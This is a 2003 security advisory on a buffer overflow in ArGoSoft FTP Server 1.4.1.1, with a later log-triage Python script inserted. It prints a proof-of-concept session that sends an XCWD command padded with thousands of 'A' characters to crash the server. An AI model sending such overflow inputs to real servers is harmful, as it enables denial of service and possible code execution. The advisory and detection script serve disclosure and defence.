[NT] ArGoSoft FTP Server XCMD Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 09/29/03

    To: list@securiteam.com
    Date: 29 Sep 2003 14:21:57 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      ArGoSoft FTP Server XCMD Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

    ArGoSoft FTP Server (http://www.argosoft.com/applications/ftpserver/) is
    "a FTP server for Windows95/98/NT, and supports all basic FTP commands,
    and much more, such as passive mode, resuming file transfers, windows
    shortcuts to another files, folders and drives (including network drives),
    virtual domains (multiple IP homes), IP filtering, site specific commands,
    such as compressing and copying files on the server, changing date/time
    stamps, and so on".

    A buffer overflow vulnerability exists in the product that allows remote
    attackers to overflow an internal buffer, causing the product to execute
    arbitrary code.

    DETAILS

    Vulnerable systems:
     * ArGoSoft FTP Server version 1.4 (1.4.1.1)

    Immune systems:
     * ArGoSoft FTP Server version 1.4 (1.4.1.2)

    Example:
    c:\> putty.exe localhost 21
    220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1)
    user ftp
    502 Unknown command
    user ftp
    331 User name OK, need password
    pass ftp
    230 User ftp logged in successfully **
    XCWD AAAAAAA....(5000 times)
    client closed connection.

    In the log file you will see something like:
    9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
    9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
    9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32
    in module 'ftpsrvnt.exe'. Write of address 41414145
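
One way to triage the server log for this crash signature, as an added example (not part of the original advisory, and not ArGoSoft or SecuriTeam code): it rejoins wrapped entries, ties each access violation to the client IP, and flags fault addresses that sit next to a repeated printable byte such as 0x41414141. The function names, the 0x10 slack, the second sample session, and the reading of the number in parentheses as the connection ID are assumptions.

```python
import re

# Constructed sample in the advisory's log format; session ID=2 is invented for contrast.
SAMPLE_LOG = """\
9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32
in module 'ftpsrvnt.exe'. Write of address 41414145
9/22/2003 1:40:02 PM - Requested FTP connection from 192.0.2.10 ID=2
9/22/2003 1:40:05 PM - ( 2) 'Error: Access violation at address 00401F32 in module 'ftpsrvnt.exe'. Write of address 00000004
"""

STAMP = re.compile(r"^(\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M) - (.*)$")
CONNECT = re.compile(r"Requested FTP connection from (\S+) ID=(\d+)")
FAULT = re.compile(r"\(\s*(\d+)\)\s*'Error: Access violation at address "
                   r"([0-9A-Fa-f]{8}).*?(Read|Write) of address ([0-9A-Fa-f]{8})")

def join_wrapped(text):
    """Re-attach continuation lines (no leading timestamp) to their entry."""
    entries = []
    for line in text.splitlines():
        if STAMP.match(line):
            entries.append(line.strip())
        elif entries and line.strip():
            entries[-1] += " " + line.strip()
    return entries

def input_derived(addr_hex, slack=0x10):
    """True if within `slack` of a printable byte repeated four times (0x41414141 = 'AAAA')."""
    addr = int(addr_hex, 16)
    return any(abs(addr - b * 0x01010101) <= slack for b in range(0x20, 0x7F))

def triage(text):
    """Return one record per access violation, tied to the client by session ID."""
    clients, findings = {}, []
    for entry in join_wrapped(text):
        when, body = STAMP.match(entry).groups()
        conn, fault = CONNECT.search(body), FAULT.search(body)
        if conn:
            clients[conn.group(2)] = conn.group(1)
        elif fault:
            sid, pc, access, target = fault.groups()
            findings.append({"time": when, "client": clients.get(sid, "unknown"),
                             "fault_at": pc, "access": access, "target": target,
                             "suspicious": input_derived(target)})
    return findings

if __name__ == "__main__":
    print(*triage(SAMPLE_LOG), sep="\n")
```

A fault whose target address is flagged means bytes from the request ended up being used as a pointer, which separates this overflow from an ordinary crash at a low or null address.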

    Vendor response:
    ArGoSoft has confirmed that there is a bug in the product. Version 1.4.1.2
    has been released and can be downloaded from:
    http://www.argosoft.com/applications/ftpserver/download.asp

    ADDITIONAL INFORMATION

    The information has been provided by Moran Zavdi
    <moran@moozatech.com>.

